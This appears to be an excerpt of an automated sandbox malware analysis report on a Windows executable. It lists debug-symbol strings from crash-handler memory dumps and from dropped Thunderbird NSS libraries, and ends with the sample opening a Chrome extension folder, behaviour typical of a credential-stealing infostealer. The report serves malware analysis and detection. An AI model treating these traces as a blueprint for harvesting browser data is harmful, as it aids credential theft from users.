Source: Binary string: urlmon.pdbi source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb. source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr
Source: Binary string: gdiplus.pdbp source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: version.pdb+ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdblX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbS source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb! source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb- source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbV source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb? source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb?A source: WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb< source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: shlwapi.pdb2 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb9 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbQ source: WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb$ source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb- source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb9 source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr
Source: Binary string: dwmapi.pdbxXiG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source: Binary string: propsys.pdb3 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb\ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbs source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbZXOG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbrQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbDX}G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbW source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.322487440.0000000002C3D000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.460504934.00000000029ED000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbvX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbh source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515291891.0000000005479000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb(XYGr source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbG source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdbw source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb] source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb@Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb] source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb<I source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbNX{G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb) source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb[ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb$Q.G source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdbZ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb& source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb( source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source: Binary string: wininet.pdb' source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb7 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb<@ source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: combase.pdbb source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb{ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
